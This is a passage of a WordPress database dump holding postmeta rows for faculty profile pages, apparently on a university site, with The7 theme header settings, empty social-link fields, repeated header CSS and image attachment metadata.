(25359,3595,'_dt_teammate_options_flickr',''),
(25360,3595,'_dt_teammate_options_lastfm',''),
(25361,3595,'_dt_teammate_options_linkedin',''),
(25362,3595,'_dt_teammate_options_vimeo',''),
(25363,3595,'_dt_teammate_options_tumbler',''),
(25364,3595,'_dt_teammate_options_pinterest',''),
(25365,3595,'_dt_teammate_options_devian',''),
(25366,3595,'_dt_teammate_options_skype',''),
(25367,3595,'_dt_teammate_options_github',''),
(25368,3595,'_dt_teammate_options_instagram',''),
(25369,3595,'_dt_teammate_options_stumbleupon',''),
(25370,3595,'_dt_teammate_options_behance',''),
(25371,3595,'_dt_teammate_options_px-500',''),
(25372,3595,'_dt_teammate_options_tripedvisor',''),
(25373,3595,'_dt_teammate_options_vk',''),
(25374,3595,'_dt_teammate_options_foursquare',''),
(25375,3595,'_dt_teammate_options_xing',''),
(25376,3595,'_dt_teammate_options_weibo',''),
(25377,3595,'_dt_teammate_options_odnoklassniki',''),
(25378,3595,'_dt_teammate_options_research-gate',''),
(25379,3595,'_dt_teammate_options_yelp',''),
(25380,3595,'_dt_teammate_options_blogger',''),
(25381,3595,'_dt_teammate_options_soundcloud',''),
(25382,3595,'_dt_teammate_options_viber',''),
(25383,3595,'_dt_teammate_options_whatsapp',''),
(25384,3595,'_dt_teammate_options_reddit',''),
(25385,3595,'_dt_teammate_options_snapchat',''),
(25386,3595,'_dt_teammate_options_telegram',''),
(25387,3595,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(25388,3597,'_edit_lock','1673731121:1'),
(25389,3598,'_wp_attached_file','2023/01/loc11.jpg'),
(25390,3598,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:158;s:6:\"height\";i:192;s:4:\"file\";s:17:\"2023/01/loc11.jpg\";s:8:\"filesize\";i:31707;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"loc11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4143;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25391,3597,'_thumbnail_id','3598'),
(25392,3597,'_edit_last','1'),
(25393,3597,'_dt_sidebar_position','disabled'),
(25394,3597,'_dt_sidebar_widgetarea_id','sidebar_1'),
(25395,3597,'_dt_sidebar_hide_on_mobile','0'),
(25396,3597,'_dt_footer_show','1'),
(25397,3597,'_dt_footer_widgetarea_id','sidebar_2'),
(25398,3597,'_dt_footer_hide_on_mobile','0'),
(25399,3597,'_dt_header_title','fancy'),
(25400,3597,'_dt_header_background','normal'),
(25401,3597,'_dt_header_background_below_slideshow','disabled'),
(25402,3597,'_dt_header_transparent_bg_color_scheme','light'),
(25403,3597,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(25404,3597,'_dt_header_transparent_top_bar_bg_opacity','25'),
(25405,3597,'_dt_header_transparent_bg_color','#000000'),
(25406,3597,'_dt_header_transparent_bg_opacity','50'),
(25407,3597,'_dt_header_disabled_background','normal'),
(25408,3597,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(25409,3597,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(25410,3597,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(25411,3597,'_dt_header_disabled_transparent_bg_color','#000000'),
(25412,3597,'_dt_header_disabled_transparent_bg_opacity','50'),
(25413,3597,'_dt_page_overrides_top_margin',''),
(25414,3597,'_dt_page_overrides_right_margin',''),
(25415,3597,'_dt_page_overrides_bottom_margin',''),
(25416,3597,'_dt_page_overrides_left_margin',''),
(25417,3597,'_dt_mobile_page_padding_top',''),
(25418,3597,'_dt_mobile_page_padding_right',''),
(25419,3597,'_dt_mobile_page_padding_bottom',''),
(25420,3597,'_dt_mobile_page_padding_left',''),
(25421,3597,'_dt_fancy_header_layout_heading',''),
(25422,3597,'_dt_fancy_header_title_aligment','center'),
(25423,3597,'_dt_fancy_header_height','300'),
(25424,3597,'_dt_fancy_header_padding-top','0px'),
(25425,3597,'_dt_fancy_header_padding-bottom','0px'),
(25426,3597,'_dt_fancy_header_breadcrumbs_heading',''),
(25427,3597,'_dt_fancy_header_breadcrumbs','disabled'),
(25428,3597,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(25429,3597,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(25430,3597,'_dt_fancy_header_title_heading',''),
(25431,3597,'_dt_fancy_header_title_mode','custom'),
(25432,3597,'_dt_fancy_header_title','Assistant Prof. Ahmed Elsharkawy'),
(25433,3597,'_dt_fancy_header_title_font_size','30'),
(25434,3597,'_dt_fancy_header_title_line_height','36'),
(25435,3597,'_dt_fancy_header_text_transform','none'),
(25436,3597,'_dt_fancy_header_title_color_mode','color'),
(25437,3597,'_dt_fancy_header_title_color','#ffffff'),
(25438,3597,'_dt_fancy_header_subtitle_heading',''),
(25439,3597,'_dt_fancy_header_subtitle',''),
(25440,3597,'_dt_fancy_header_subtitle_font_size','18'),
(25441,3597,'_dt_fancy_header_subtitle_line_height','26'),
(25442,3597,'_dt_fancy_header_subtitle_text_transform','none'),
(25443,3597,'_dt_fancy_header_subtitle_color_mode','color'),
(25444,3597,'_dt_fancy_header_subtitle_color','#ffffff'),
(25445,3597,'_dt_fancy_header_bg_heading',''),
(25446,3597,'_dt_fancy_header_bg_color','#222222'),
(25447,3597,'_dt_fancy_header_bg_image_origin','custom'),
(25448,3597,'_dt_fancy_header_bg_image','a:0:{}'),
(25449,3597,'_dt_fancy_header_bg_repeat','no-repeat'),
(25450,3597,'_dt_fancy_header_bg_position_x','center'),
(25451,3597,'_dt_fancy_header_bg_position_y','center'),
(25452,3597,'_dt_fancy_header_bg_fullscreen','1'),
(25453,3597,'_dt_fancy_header_bg_overlay','0'),
(25454,3597,'_dt_fancy_header_overlay_color','#000'),
(25455,3597,'_dt_fancy_header_bg_overlay_opacity','50'),
(25456,3597,'_dt_fancy_header_scroll_effect','default'),
(25457,3597,'_dt_fancy_header_bg_parallax','0.5'),
(25458,3597,'_dt_fancy_header_responsiveness_heading',''),
(25459,3597,'_dt_fancy_header_responsiveness','disabled'),
(25460,3597,'_dt_fancy_header_responsiveness_switch','778px'),
(25461,3597,'_dt_fancy_header_responsive_height','70'),
(25462,3597,'_dt_fancy_header_responsive_font_size','30'),
(25463,3597,'_dt_fancy_header_responsive_title_line_height','38'),
(25464,3597,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(25465,3597,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(25466,3597,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(25467,3597,'_dt_teammate_options_go_to_single','1'),
(25468,3597,'_dt_teammate_options_position',''),
(25469,3597,'_dt_teammate_options_website',''),
(25470,3597,'_dt_teammate_options_mail',''),
(25471,3597,'_dt_teammate_options_facebook',''),
(25472,3597,'_dt_teammate_options_twitter',''),
(25473,3597,'_dt_teammate_options_dribbble',''),
(25474,3597,'_dt_teammate_options_you-tube',''),
(25475,3597,'_dt_teammate_options_rss',''),
(25476,3597,'_dt_teammate_options_delicious',''),
(25477,3597,'_dt_teammate_options_flickr',''),
(25478,3597,'_dt_teammate_options_lastfm',''),
(25479,3597,'_dt_teammate_options_linkedin',''),
(25480,3597,'_dt_teammate_options_vimeo',''),
(25481,3597,'_dt_teammate_options_tumbler',''),
(25482,3597,'_dt_teammate_options_pinterest',''),
(25483,3597,'_dt_teammate_options_devian',''),
(25484,3597,'_dt_teammate_options_skype',''),
(25485,3597,'_dt_teammate_options_github',''),
(25486,3597,'_dt_teammate_options_instagram',''),
(25487,3597,'_dt_teammate_options_stumbleupon',''),
(25488,3597,'_dt_teammate_options_behance',''),
(25489,3597,'_dt_teammate_options_px-500',''),
(25490,3597,'_dt_teammate_options_tripedvisor',''),
(25491,3597,'_dt_teammate_options_vk',''),
(25492,3597,'_dt_teammate_options_foursquare',''),
(25493,3597,'_dt_teammate_options_xing',''),
(25494,3597,'_dt_teammate_options_weibo',''),
(25495,3597,'_dt_teammate_options_odnoklassniki',''),
(25496,3597,'_dt_teammate_options_research-gate',''),
(25497,3597,'_dt_teammate_options_yelp',''),
(25498,3597,'_dt_teammate_options_blogger',''),
(25499,3597,'_dt_teammate_options_soundcloud',''),
(25500,3597,'_dt_teammate_options_viber',''),
(25501,3597,'_dt_teammate_options_whatsapp',''),
(25502,3597,'_dt_teammate_options_reddit',''),
(25503,3597,'_dt_teammate_options_snapchat',''),
(25504,3597,'_dt_teammate_options_telegram',''),
(25505,3597,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(25506,3599,'_edit_lock','1673731321:1'),
(25507,3600,'_wp_attached_file','2023/01/lec12.jpg'),
(25508,3600,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:170;s:6:\"height\";i:228;s:4:\"file\";s:17:\"2023/01/lec12.jpg\";s:8:\"filesize\";i:50934;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"lec12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5870;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25509,3599,'_thumbnail_id','3600'),
(25510,3599,'_edit_last','1'),
(25511,3599,'_dt_sidebar_position','disabled'),
(25512,3599,'_dt_sidebar_widgetarea_id','sidebar_1'),
(25513,3599,'_dt_sidebar_hide_on_mobile','0'),
(25514,3599,'_dt_footer_show','1'),
(25515,3599,'_dt_footer_widgetarea_id','sidebar_2'),
(25516,3599,'_dt_footer_hide_on_mobile','0'),
(25517,3599,'_dt_header_title','fancy'),
(25518,3599,'_dt_header_background','normal'),
(25519,3599,'_dt_header_background_below_slideshow','disabled'),
(25520,3599,'_dt_header_transparent_bg_color_scheme','light'),
(25521,3599,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(25522,3599,'_dt_header_transparent_top_bar_bg_opacity','25'),
(25523,3599,'_dt_header_transparent_bg_color','#000000'),
(25524,3599,'_dt_header_transparent_bg_opacity','50'),
(25525,3599,'_dt_header_disabled_background','normal'),
(25526,3599,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(25527,3599,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(25528,3599,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(25529,3599,'_dt_header_disabled_transparent_bg_color','#000000'),
(25530,3599,'_dt_header_disabled_transparent_bg_opacity','50'),
(25531,3599,'_dt_page_overrides_top_margin',''),
(25532,3599,'_dt_page_overrides_right_margin',''),
(25533,3599,'_dt_page_overrides_bottom_margin',''),
(25534,3599,'_dt_page_overrides_left_margin',''),
(25535,3599,'_dt_mobile_page_padding_top',''),
(25536,3599,'_dt_mobile_page_padding_right',''),
(25537,3599,'_dt_mobile_page_padding_bottom',''),
(25538,3599,'_dt_mobile_page_padding_left',''),
(25539,3599,'_dt_fancy_header_layout_heading',''),
(25540,3599,'_dt_fancy_header_title_aligment','center'),
(25541,3599,'_dt_fancy_header_height','300'),
(25542,3599,'_dt_fancy_header_padding-top','0px'),
(25543,3599,'_dt_fancy_header_padding-bottom','0px'),
(25544,3599,'_dt_fancy_header_breadcrumbs_heading',''),
(25545,3599,'_dt_fancy_header_breadcrumbs','disabled'),
(25546,3599,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(25547,3599,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(25548,3599,'_dt_fancy_header_title_heading',''),
(25549,3599,'_dt_fancy_header_title_mode','custom'),
(25550,3599,'_dt_fancy_header_title','Dr. Eng. Ashraf Talaat M. Abdalllah'),
(25551,3599,'_dt_fancy_header_title_font_size','30'),
(25552,3599,'_dt_fancy_header_title_line_height','36'),
(25553,3599,'_dt_fancy_header_text_transform','none'),
(25554,3599,'_dt_fancy_header_title_color_mode','color'),
(25555,3599,'_dt_fancy_header_title_color','#ffffff'),
(25556,3599,'_dt_fancy_header_subtitle_heading',''),
(25557,3599,'_dt_fancy_header_subtitle',''),
(25558,3599,'_dt_fancy_header_subtitle_font_size','18'),
(25559,3599,'_dt_fancy_header_subtitle_line_height','26'),
(25560,3599,'_dt_fancy_header_subtitle_text_transform','none'),
(25561,3599,'_dt_fancy_header_subtitle_color_mode','color'),
(25562,3599,'_dt_fancy_header_subtitle_color','#ffffff'),
(25563,3599,'_dt_fancy_header_bg_heading',''),
(25564,3599,'_dt_fancy_header_bg_color','#222222'),
(25565,3599,'_dt_fancy_header_bg_image_origin','custom'),
(25566,3599,'_dt_fancy_header_bg_image','a:0:{}'),
(25567,3599,'_dt_fancy_header_bg_repeat','no-repeat'),
(25568,3599,'_dt_fancy_header_bg_position_x','center'),
(25569,3599,'_dt_fancy_header_bg_position_y','center'),
(25570,3599,'_dt_fancy_header_bg_fullscreen','1'),
(25571,3599,'_dt_fancy_header_bg_overlay','0'),
(25572,3599,'_dt_fancy_header_overlay_color','#000'),
(25573,3599,'_dt_fancy_header_bg_overlay_opacity','50'),
(25574,3599,'_dt_fancy_header_scroll_effect','default'),
(25575,3599,'_dt_fancy_header_bg_parallax','0.5'),
(25576,3599,'_dt_fancy_header_responsiveness_heading',''),
(25577,3599,'_dt_fancy_header_responsiveness','disabled'),
(25578,3599,'_dt_fancy_header_responsiveness_switch','778px'),
(25579,3599,'_dt_fancy_header_responsive_height','70'),
(25580,3599,'_dt_fancy_header_responsive_font_size','30'),
(25581,3599,'_dt_fancy_header_responsive_title_line_height','38'),
(25582,3599,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(25583,3599,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(25584,3599,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(25585,3599,'_dt_teammate_options_go_to_single','1'),
(25586,3599,'_dt_teammate_options_position',''),
(25587,3599,'_dt_teammate_options_website',''),
(25588,3599,'_dt_teammate_options_mail',''),
(25589,3599,'_dt_teammate_options_facebook',''),
(25590,3599,'_dt_teammate_options_twitter',''),
(25591,3599,'_dt_teammate_options_dribbble',''),
(25592,3599,'_dt_teammate_options_you-tube',''),
(25593,3599,'_dt_teammate_options_rss',''),
(25594,3599,'_dt_teammate_options_delicious',''),
(25595,3599,'_dt_teammate_options_flickr',''),
(25596,3599,'_dt_teammate_options_lastfm',''),
(25597,3599,'_dt_teammate_options_linkedin',''),
(25598,3599,'_dt_teammate_options_vimeo',''),
(25599,3599,'_dt_teammate_options_tumbler',''),
(25600,3599,'_dt_teammate_options_pinterest',''),
(25601,3599,'_dt_teammate_options_devian',''),
(25602,3599,'_dt_teammate_options_skype',''),
(25603,3599,'_dt_teammate_options_github',''),
(25604,3599,'_dt_teammate_options_instagram',''),
(25605,3599,'_dt_teammate_options_stumbleupon',''),
(25606,3599,'_dt_teammate_options_behance',''),
(25607,3599,'_dt_teammate_options_px-500',''),
(25608,3599,'_dt_teammate_options_tripedvisor',''),
(25609,3599,'_dt_teammate_options_vk',''),
(25610,3599,'_dt_teammate_options_foursquare',''),
(25611,3599,'_dt_teammate_options_xing',''),
(25612,3599,'_dt_teammate_options_weibo',''),
(25613,3599,'_dt_teammate_options_odnoklassniki',''),
(25614,3599,'_dt_teammate_options_research-gate',''),
(25615,3599,'_dt_teammate_options_yelp',''),
(25616,3599,'_dt_teammate_options_blogger',''),
(25617,3599,'_dt_teammate_options_soundcloud',''),
(25618,3599,'_dt_teammate_options_viber',''),
(25619,3599,'_dt_teammate_options_whatsapp',''),
(25620,3599,'_dt_teammate_options_reddit',''),
(25621,3599,'_dt_teammate_options_snapchat',''),
(25622,3599,'_dt_teammate_options_telegram','');
INSERT INTO `dnctiavkr_postmeta` VALUES
(25623,3599,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(25624,3601,'_edit_lock','1673731442:1'),
(25625,3602,'_wp_attached_file','2023/01/loc13.jpg'),
(25626,3602,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:96;s:6:\"height\";i:123;s:4:\"file\";s:17:\"2023/01/loc13.jpg\";s:8:\"filesize\";i:21044;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25627,3601,'_thumbnail_id','3602'),
(25628,3601,'_edit_last','1'),
(25629,3601,'_dt_sidebar_position','disabled'),
(25630,3601,'_dt_sidebar_widgetarea_id','sidebar_1'),
(25631,3601,'_dt_sidebar_hide_on_mobile','0'),
(25632,3601,'_dt_footer_show','1'),
(25633,3601,'_dt_footer_widgetarea_id','sidebar_2'),
(25634,3601,'_dt_footer_hide_on_mobile','0'),
(25635,3601,'_dt_header_title','fancy'),
(25636,3601,'_dt_header_background','normal'),
(25637,3601,'_dt_header_background_below_slideshow','disabled'),
(25638,3601,'_dt_header_transparent_bg_color_scheme','light'),
(25639,3601,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(25640,3601,'_dt_header_transparent_top_bar_bg_opacity','25'),
(25641,3601,'_dt_header_transparent_bg_color','#000000'),
(25642,3601,'_dt_header_transparent_bg_opacity','50'),
(25643,3601,'_dt_header_disabled_background','normal'),
(25644,3601,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(25645,3601,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(25646,3601,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(25647,3601,'_dt_header_disabled_transparent_bg_color','#000000'),
(25648,3601,'_dt_header_disabled_transparent_bg_opacity','50'),
(25649,3601,'_dt_page_overrides_top_margin',''),
(25650,3601,'_dt_page_overrides_right_margin',''),
(25651,3601,'_dt_page_overrides_bottom_margin',''),
(25652,3601,'_dt_page_overrides_left_margin',''),
(25653,3601,'_dt_mobile_page_padding_top',''),
(25654,3601,'_dt_mobile_page_padding_right',''),
(25655,3601,'_dt_mobile_page_padding_bottom',''),
(25656,3601,'_dt_mobile_page_padding_left',''),
(25657,3601,'_dt_fancy_header_layout_heading',''),
(25658,3601,'_dt_fancy_header_title_aligment','center'),
(25659,3601,'_dt_fancy_header_height','300'),
(25660,3601,'_dt_fancy_header_padding-top','0px'),
(25661,3601,'_dt_fancy_header_padding-bottom','0px'),
(25662,3601,'_dt_fancy_header_breadcrumbs_heading',''),
(25663,3601,'_dt_fancy_header_breadcrumbs','disabled'),
(25664,3601,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(25665,3601,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(25666,3601,'_dt_fancy_header_title_heading',''),
(25667,3601,'_dt_fancy_header_title_mode','custom'),
(25668,3601,'_dt_fancy_header_title','Prof. Nagwa El-Ashmawy'),
(25669,3601,'_dt_fancy_header_title_font_size','30'),
(25670,3601,'_dt_fancy_header_title_line_height','36'),
(25671,3601,'_dt_fancy_header_text_transform','none'),
(25672,3601,'_dt_fancy_header_title_color_mode','color'),
(25673,3601,'_dt_fancy_header_title_color','#ffffff'),
(25674,3601,'_dt_fancy_header_subtitle_heading',''),
(25675,3601,'_dt_fancy_header_subtitle',''),
(25676,3601,'_dt_fancy_header_subtitle_font_size','18'),
(25677,3601,'_dt_fancy_header_subtitle_line_height','26'),
(25678,3601,'_dt_fancy_header_subtitle_text_transform','none'),
(25679,3601,'_dt_fancy_header_subtitle_color_mode','color'),
(25680,3601,'_dt_fancy_header_subtitle_color','#ffffff'),
(25681,3601,'_dt_fancy_header_bg_heading',''),
(25682,3601,'_dt_fancy_header_bg_color','#222222'),
(25683,3601,'_dt_fancy_header_bg_image_origin','custom'),
(25684,3601,'_dt_fancy_header_bg_image','a:0:{}'),
(25685,3601,'_dt_fancy_header_bg_repeat','no-repeat'),
(25686,3601,'_dt_fancy_header_bg_position_x','center'),
(25687,3601,'_dt_fancy_header_bg_position_y','center'),
(25688,3601,'_dt_fancy_header_bg_fullscreen','1'),
(25689,3601,'_dt_fancy_header_bg_overlay','0'),
(25690,3601,'_dt_fancy_header_overlay_color','#000'),
(25691,3601,'_dt_fancy_header_bg_overlay_opacity','50'),
(25692,3601,'_dt_fancy_header_scroll_effect','default'),
(25693,3601,'_dt_fancy_header_bg_parallax','0.5'),
(25694,3601,'_dt_fancy_header_responsiveness_heading',''),
(25695,3601,'_dt_fancy_header_responsiveness','disabled'),
(25696,3601,'_dt_fancy_header_responsiveness_switch','778px'),
(25697,3601,'_dt_fancy_header_responsive_height','70'),
(25698,3601,'_dt_fancy_header_responsive_font_size','30'),
(25699,3601,'_dt_fancy_header_responsive_title_line_height','38'),
(25700,3601,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(25701,3601,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(25702,3601,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(25703,3601,'_dt_teammate_options_go_to_single','1'),
(25704,3601,'_dt_teammate_options_position',''),
(25705,3601,'_dt_teammate_options_website',''),
(25706,3601,'_dt_teammate_options_mail',''),
(25707,3601,'_dt_teammate_options_facebook',''),
(25708,3601,'_dt_teammate_options_twitter',''),
(25709,3601,'_dt_teammate_options_dribbble',''),
(25710,3601,'_dt_teammate_options_you-tube',''),
(25711,3601,'_dt_teammate_options_rss',''),
(25712,3601,'_dt_teammate_options_delicious',''),
(25713,3601,'_dt_teammate_options_flickr',''),
(25714,3601,'_dt_teammate_options_lastfm',''),
(25715,3601,'_dt_teammate_options_linkedin',''),
(25716,3601,'_dt_teammate_options_vimeo',''),
(25717,3601,'_dt_teammate_options_tumbler',''),
(25718,3601,'_dt_teammate_options_pinterest',''),
(25719,3601,'_dt_teammate_options_devian',''),
(25720,3601,'_dt_teammate_options_skype',''),
(25721,3601,'_dt_teammate_options_github',''),
(25722,3601,'_dt_teammate_options_instagram',''),
(25723,3601,'_dt_teammate_options_stumbleupon',''),
(25724,3601,'_dt_teammate_options_behance',''),
(25725,3601,'_dt_teammate_options_px-500',''),
(25726,3601,'_dt_teammate_options_tripedvisor',''),
(25727,3601,'_dt_teammate_options_vk',''),
(25728,3601,'_dt_teammate_options_foursquare',''),
(25729,3601,'_dt_teammate_options_xing',''),
(25730,3601,'_dt_teammate_options_weibo',''),
(25731,3601,'_dt_teammate_options_odnoklassniki',''),
(25732,3601,'_dt_teammate_options_research-gate',''),
(25733,3601,'_dt_teammate_options_yelp',''),
(25734,3601,'_dt_teammate_options_blogger',''),
(25735,3601,'_dt_teammate_options_soundcloud',''),
(25736,3601,'_dt_teammate_options_viber',''),
(25737,3601,'_dt_teammate_options_whatsapp',''),
(25738,3601,'_dt_teammate_options_reddit',''),
(25739,3601,'_dt_teammate_options_snapchat',''),
(25740,3601,'_dt_teammate_options_telegram',''),
